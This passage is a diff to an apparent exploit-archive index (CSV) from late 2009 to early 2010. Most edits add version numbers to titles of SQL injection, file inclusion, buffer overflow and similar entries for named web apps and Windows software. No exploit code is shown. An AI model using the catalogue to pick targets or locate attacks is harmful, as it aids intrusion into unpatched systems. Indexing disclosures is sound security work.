10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0 @@ -9991,7 +9991,7 @@ id,file,description,date,author,platform,type,port 10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal BOF (Python)",2009-12-29,jacky,windows,local,0 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BOF (Python)",2009-12-29,jacky,windows,local,0 -10788,platforms/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base SQL injection vulnerability",2009-12-29,kaMtiEz,php,webapps,0 +10788,platforms/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection Vulnerability",2009-12-29,kaMtiEz,php,webapps,0 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia cross site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 @@ -10060,7 +10060,7 @@ id,file,description,date,author,platform,type,port 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 .aap BOF DoS Vulnerability",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS/CSRF Vulnerabilities",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog Database Disclosure Vulnerability",2010-01-01,LionTurk,asp,webapps,0 -10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) SQL Injection Vulnerability",2010-01-01,BAYBORA,asp,webapps,0 +10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) 1.7.1.2 - SQL Injection Vulnerability",2010-01-01,BAYBORA,asp,webapps,0 10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 @@ -10120,19 +10120,19 @@ id,file,description,date,author,platform,type,port 10980,platforms/linux/remote/10980.txt,"Skype for Linux <= 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 -10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 +10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads 1.0 - Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 Arabic Version - File Inclusion Vulnerability",2010-01-04,indoushka,php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects Blind SQL Injection Vulnerability",2010-01-04,Pyske,php,webapps,0 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone SQL Injection Vulnerability",2010-01-04,alnjm33,php,webapps,0 -11003,platforms/php/webapps/11003.txt,"LightOpen CMS Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 +11003,platforms/php/webapps/11003.txt,"LightOpen CMS 0.1 - Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure Vulnerability",2010-01-04,LionTurk,asp,webapps,0 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability",2010-01-05,indoushka,asp,webapps,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware CIFS And AFP Remote Memory Consumption DoS",2010-01-05,"Francis Provencher",multiple,dos,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 & 7.4 - Buffer Overflow (meta)",2010-01-06,blake,windows,local,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0 -11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition Multiple Vulnerabilities (LFI/SQLi/Xss)",2010-01-06,"Zer0 Thunder",php,webapps,0 +11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Multiple Vulnerabilities (LFI/SQLi/Xss)",2010-01-06,"Zer0 Thunder",php,webapps,0 11014,platforms/php/webapps/11014.txt,"Myuploader >> upload shell exploit",2010-01-06,S2K9,php,webapps,0 11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 @@ -10258,12 +10258,12 @@ id,file,description,date,author,platform,type,port 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2",2010-01-18,"John Babio",windows,remote,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 (.mp3) Local Denial of Service (DoS)",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 -11183,platforms/php/webapps/11183.txt,"Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System",2010-01-18,"Prashant Khandelwal",php,webapps,0 -11184,platforms/multiple/webapps/11184.txt,"Permanent Cross-Site Scripting (XSS) in FreePBX 2.5.x – 2.6.0",2010-01-18,"Ivan Huertas",multiple,webapps,0 +11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilites",2010-01-18,"Prashant Khandelwal",php,webapps,0 +11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x - 2.6.0 - Permanent Cross-Site Scripting (XSS)",2010-01-18,"Ivan Huertas",multiple,webapps,0 11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL injection",2010-01-18,"Ivan Huertas",multiple,webapps,0 -11187,platforms/multiple/webapps/11187.txt,"Information disclosure in FreePBX 2.5.x",2010-01-18,"Ivan Huertas",multiple,webapps,0 -11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) Remote FiLe include RFI",2010-01-18,kaMtiEz,php,webapps,0 +11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 +11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Include (RFI)",2010-01-18,kaMtiEz,php,webapps,0 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u File) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 @@ -10288,7 +10288,7 @@ id,file,description,date,author,platform,type,port 11216,platforms/php/webapps/11216.txt,"Blog System 1.x (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 -11219,platforms/windows/local/11219.pl,"SOMPL Player Buffer Overflow",2010-01-22,Rick2600,windows,local,0 +11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver SQL Injection Vulnerability",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0 @@ -10342,8 +10342,8 @@ id,file,description,date,author,platform,type,port 11286,platforms/php/webapps/11286.txt,"Joomla JReservation Blind SQL Injection Vulnerability",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla Component JE Quiz Blind SQL Injection Vulnerability",2010-01-29,B-HUNT3|2,php,webapps,0 11288,platforms/multiple/dos/11288.py,"Wireshark 1.2.5 LWRES getaddrbyname stack BOF",2010-01-29,babi,multiple,dos,0 -11289,platforms/php/webapps/11289.txt,"Joomla Component com_dms SQL Injection Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 -11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager LFI Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 +11289,platforms/php/webapps/11289.txt,"Joomla Component com_dms 2.5.1 - SQL Injection Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 +11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - LFI Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 11291,platforms/hardware/dos/11291.txt,"Xerox Workcenter 4150 Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos,0 11292,platforms/php/webapps/11292.txt,"Joomla Component JE Event Calendar SQL Injection Vulnerability",2010-01-30,B-HUNT3|2,php,webapps,0 11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote BOF Exploit",2010-01-30,Dz_attacker,windows,remote,0 @@ -10387,7 +10387,7 @@ id,file,description,date,author,platform,type,port 11336,platforms/php/webapps/11336.txt,"Open Bulletin Board Multiple Blind SQL Injection Vulnerability",2010-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla (com_photoblog) Blind SQL Injection Vulnerability",2010-02-06,"ALTBTA ",php,webapps,0 11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap BOF exploit",2010-02-06,TecR0c,windows,dos,0 -11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 +11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net cms 1.5 - Remote File Upload Vulnerability",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single <= 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local DoS Vulnerability",2010-02-06,"Nishant Das Patnaik",windows,dos,0 @@ -10444,10 +10444,10 @@ id,file,description,date,author,platform,type,port 11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 XSS, Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS Vulnerability",2010-02-11,s4squatch,multiple,webapps,80 -11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) Database Disclosure Vulnerability",2010-02-11,Phenom,windows,webapps,80 +11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure Vulnerability",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service Vulnerability",2010-02-11,"Beenu Arora",windows,dos,80 11408,platforms/win32/local/11408.c,"Radasm .rap file local buffer overflow vulnerability",2010-02-11,"fl0 fl0w",win32,local,0 -11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script SQL Injection Vulnerability",2010-02-11,JaMbA,multiple,webapps,80 +11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection Vulnerability",2010-02-11,JaMbA,multiple,webapps,80 11410,platforms/php/webapps/11410.txt,"Vacation Rental Script SQL Injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 11411,platforms/php/webapps/11411.txt,"apemCMS SQL Injection Vulnerability",2010-02-11,Ariko-Security,php,webapps,0 11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 @@ -10460,7 +10460,7 @@ id,file,description,date,author,platform,type,port 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch Remote SQL Injection Vulnerability",2010-02-12,snakespc,php,webapps,0 11426,platforms/multiple/dos/11426.txt,"Browser address bar characters into a small feature",2010-02-12,"Pouya Daneshmand",multiple,dos,0 -11427,platforms/hardware/dos/11427.txt,"Multiple Web Browser Vulnerabilities in Nokia Symbian OS 3rd Edition",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 +11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11429,platforms/php/webapps/11429.txt,"Vito CMS SQL Injection Vulnerability",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web (products.php) SQL Injection Vulnerability",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload Remote file upload Vulnerability",2010-02-13,Phenom,php,webapps,0 @@ -10480,12 +10480,12 @@ id,file,description,date,author,platform,type,port 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS) #",2010-02-14,Mr.tro0oqy,windows,dos,0 -11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 +11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0 -11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog SQL injection",2010-02-15,kaMtiEz,php,webapps,0 +11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 - SQL injection",2010-02-15,kaMtiEz,php,webapps,0 11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (Bypass) Vulnerability",2010-02-15,indoushka,php,webapps,0 11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin Vulnerability",2010-02-15,indoushka,php,webapps,0 11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,indoushka,php,webapps,0 @@ -10529,9 +10529,9 @@ id,file,description,date,author,platform,type,port 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL injection vulnerability",2010-02-19,Ariko-Security,php,webapps,0 11507,platforms/php/webapps/11507.txt,"WSC CMS (Bypass) SQL Injection Vulnerability",2010-02-19,Phenom,php,webapps,0 -11508,platforms/php/webapps/11508.txt,"Trixbox PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0 +11508,platforms/php/webapps/11508.txt,"Trixbox 2.2.4 - PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0 11509,platforms/php/webapps/11509.txt,"Phpkit 1.6.1 - Multiple SQL Injection Vulnerabilities",2010-02-19,"Easy Laster",php,webapps,0 -11511,platforms/php/webapps/11511.txt,"Joomla Component com_communitypolls LFI Vulnerability",2010-02-19,kaMtiEz,php,webapps,0 +11511,platforms/php/webapps/11511.txt,"Joomla Component com_communitypolls 1.5.2 - LFI Vulnerability",2010-02-19,kaMtiEz,php,webapps,0 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0 11516,platforms/php/webapps/11516.html,"TimeClock CSRF Remote Add Admin Exploit",2010-02-20,"ViRuSMaN ",php,webapps,0 11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0 @@ -10615,7 +10615,7 @@ id,file,description,date,author,platform,type,port 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri <= 2.1 - SQL Injection Vulnerability",2010-02-28,"cr4wl3r ",php,webapps,0 11606,platforms/asp/webapps/11606.txt,"Majoda CMS (Auth Bypass) SQL Injection Vulnerability",2010-02-28,Phenom,asp,webapps,0 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 -11609,platforms/php/webapps/11609.txt,"phptroubleticket - (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0 +11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,indoushka,asp,webapps,0 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 @@ -10662,7 +10662,7 @@ id,file,description,date,author,platform,type,port 11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 -11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0 +11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0 11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote BoF (MSF Module)",2010-03-09,blake,windows,remote,0 11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g (argument) Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g (.class) Stack Overflow DoS",2010-03-09,l3D,windows,dos,0 @@ -10763,7 +10763,7 @@ id,file,description,date,author,platform,type,port 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 11777,platforms/php/webapps/11777.txt,"egroupware 1.6.002 and egroupware premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 -11779,platforms/windows/local/11779.pl,"Windisc Stack BOF exploit",2010-03-16,Rick2600,windows,local,0 +11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack BOF exploit",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF Vulnerability",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF Vulnerability",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection Vulnerability",2010-03-17,"DevilZ TM",php,webapps,0 @@ -10793,12 +10793,12 @@ id,file,description,date,author,platform,type,port 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi CSRF vulnerability",2010-03-19,K053,php,webapps,0 -11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 -11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange (pkg) Remote SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 +11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 +11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) Remote SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-20,corelanc0d3r,windows,remote,0 -11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence managnmnet Hardware[MIPS] Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 +11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 @@ -10852,7 +10852,7 @@ id,file,description,date,author,platform,type,port 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Include Vulnerability",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 -11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames SQL Vulnerability (catid)",2010-03-26,kaMtiEz,php,webapps,0 +11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames 2.0RC1 - SQL Vulnerability (catid)",2010-03-26,kaMtiEz,php,webapps,0 11885,platforms/php/webapps/11885.txt,"Flirt Matching SMS System <= SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0 @@ -11030,10 +11030,10 @@ id,file,description,date,author,platform,type,port 12087,platforms/php/webapps/12087.txt,"Joomla Component Fabrik com_fabrik Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12088,platforms/php/webapps/12088.txt,"Joomla Component Affiliate Feeds com_datafeeds Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12089,platforms/php/webapps/12089.txt,"Joomla Component Appointment com_appointment Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 -12090,platforms/freebsd/local/12090.txt,"Local Privilege Escalation in McAfee Email Gateway (formerly IronMail)",2010-04-06,"Nahuel Grisolia",freebsd,local,0 -12091,platforms/freebsd/local/12091.txt,"Internal Information Disclosure in McAfee Email Gateway (formerly IronMail)",2010-04-06,"Nahuel Grisolia",freebsd,local,0 -12092,platforms/hardware/webapps/12092.txt,"Cross-Site Scripting (XSS) in McAfee Email Gateway (formerly IronMail)",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 -12093,platforms/hardware/dos/12093.txt,"Denial of Service in McAfee Email Gateway (formerly IronMail)",2010-04-06,"Nahuel Grisolia",hardware,dos,0 +12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Local Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 +12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 +12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting (XSS)",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 +12093,platforms/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos,0 12094,platforms/php/webapps/12094.txt,"ShopSystem SQL Injection vulnerability",2010-04-06,Valentin,php,webapps,0 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash Vulnerability",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 @@ -11057,7 +11057,7 @@ id,file,description,date,author,platform,type,port 12115,platforms/php/webapps/12115.txt,"Kubeit CMS Remote SQL Injection Vulnerability",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail Local File Inclusion Vulnerability",2010-04-09,AntiSecurity,php,webapps,0 -12119,platforms/windows/remote/12119.pl,"WINDOWS FTP SERVER by DWG (Auth Bypass)",2010-04-09,chap0,windows,remote,0 +12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 12120,platforms/php/webapps/12120.txt,"Joomla Component Foobla Suggestions com_foobla Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 12121,platforms/php/webapps/12121.txt,"Joomla Component JA Voice com_javoice LFI vulnerability",2010-04-09,kaMtiEz,php,webapps,0 12122,platforms/multiple/remote/12122.txt,"JAVA Web Start Arbitrary command-line injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 @@ -11190,7 +11190,7 @@ id,file,description,date,author,platform,type,port 12262,platforms/php/webapps/12262.php,"ZykeCMS 1.1 - (Auth Bypass) SQL Injection Vulnerability",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 -12265,platforms/hardware/remote/12265.txt,"Unauthenticated File-system Access 